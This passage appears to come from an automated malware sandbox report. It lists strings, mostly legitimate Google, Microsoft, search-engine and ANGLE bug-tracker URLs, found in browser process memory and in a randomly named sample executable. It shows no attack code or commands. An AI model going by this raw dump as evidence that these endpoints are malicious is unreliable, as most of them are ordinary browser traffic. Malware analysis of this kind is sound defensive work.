0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487185901.0000782402E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
          Source: chrome.exe, 0000000A.00000003.1487204067.0000782402B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566268797.0000782402EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487226065.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485843062.00007824030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485959965.0000782403240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B4B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486113020.00007824030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487185901.0000782402E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
          Source: chrome.exe, 0000000A.00000002.1566929461.000078240304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
          Source: chrome.exe, 0000000A.00000002.1565010392.0000782402BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
          Source: chrome.exe, 0000000A.00000002.1564776046.0000782402B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
          Source: chrome.exe, 0000000A.00000002.1564924959.0000782402B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
          Source: chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmp, VKXB16.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
          Source: chrome.exe, 0000000A.00000002.1554632085.0000782402278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
          Source: chrome.exe, 0000000A.00000002.1554632085.0000782402278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetx$
          Source: chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1561855963.00007824025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565810314.0000782402DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
          Source: chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com$x
          Source: chrome.exe, 0000000A.00000002.1554280885.000078240221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565810314.0000782402DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
          Source: chrome.exe, 0000000A.00000003.1526960833.0000782402494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
          Source: chrome.exe, 0000000A.00000003.1526960833.0000782402494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
          Source: chrome.exe, 0000000A.00000002.1555537001.00007824022B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
          Source: chrome.exe, 0000000A.00000002.1555537001.00007824022B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
          Source: chrome.exe, 0000000A.00000002.1555537001.00007824022B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
          Source: chrome.exe, 0000000A.00000002.1554632085.0000782402278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1561855963.00007824025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1561855963.00007824025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
          Source: chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
          Source: chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: msedge.exe, 0000000D.00000002.1680089589.00000168C5B74000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613588090.00000168C5B74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: dZKPE9gotO.exe, 00000000.00000002.2207976235.0000000003EF1000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B9B000.00000004.00000020.00020000.00000000.sdmp, AIWTJM.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
          Source: dZKPE9gotO.exe, 00000000.00000002.2207976235.0000000003EF1000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B9B000.00000004.00000020.00020000.00000000.sdmp, AIWTJM.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
          Source: chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566326820.0000782402EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
          Source: chrome.exe, 0000000A.00000002.1565586304.0000782402D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
          Source: chrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
          Source: dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B3F000.00000004.00000020.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
          Source: chrome.exe, 0000000A.00000002.1554632085.0000782402278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
          Source: chrome.exe, 0000000A.00000002.1554632085.0000782402278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
          Source: dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B3F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1561955087.000078240261C000.00000004.00000800.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: chrome.exe, 0000000A.00000003.1484398172.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1683403996.000039980238C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
          Source: chrome.exe, 0000000A.00000002.1566353856.0000782402F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567681204.0000782403338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564924959.0000782402B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566566382.0000782402F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: chrome.exe, 0000000A.00000002.1566566382.0000782402F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en$x
          Source: chrome.exe, 0000000A.00000003.1486986919.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481279735.0000782402E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481327210.0000782402E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487889087.0000782402E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1489388170.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562044896.000078240264B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482998939.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487869153.000078240253C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1481562325.0000782402F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1484398172.0000782402F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
          Source: chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreeUtGn3No=
          Source: chrome.exe, 0000000A.00000003.1467483501.00001410006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
          Source: chrome.exe, 0000000A.00000003.1467483501.00001410006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
          Source: chrome.exe, 0000000A.00000002.1551249243.000014100078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
          Source: chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
          Source: chrome.exe, 0000000A.00000003.1467152733.000014100039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1519626664.000014100080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1466717994.0000141000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
          Source: chrome.exe, 0000000A.00000002.1560599146.000078240238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1683403996.000039980238C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.15.drString found in binary or memory: https://chromewebstore.google.com/
          Source: chrome.exe, 0000000A.00000002.1565810314.0000782402DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/_
          Source: chrome.exe, 0000000A.00000003.1463032611.000007AC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1463010046.000007AC002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
          Source: chrome.exe, 0000000A.00000002.1564664554.0000782402AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/c
          Source: chrome.exe, 0000000A.00000002.1565810314.0000782402DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562984441.0000782402838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000002.1682479086.0000399802240000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.15.drString found in binary or memory: https://clients2.google.com/service/update2/crx
          Source: chrome.exe, 0000000A.00000003.1480234874.0000782402D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
          Source: chrome.exe, 0000000A.00000002.1563161860.00007824028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
          Source: chrome.exe, 0000000A.00000002.1563161860.00007824028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
          Source: chrome.exe, 0000000A.00000002.1564865767.0000782402B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
          Source: chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
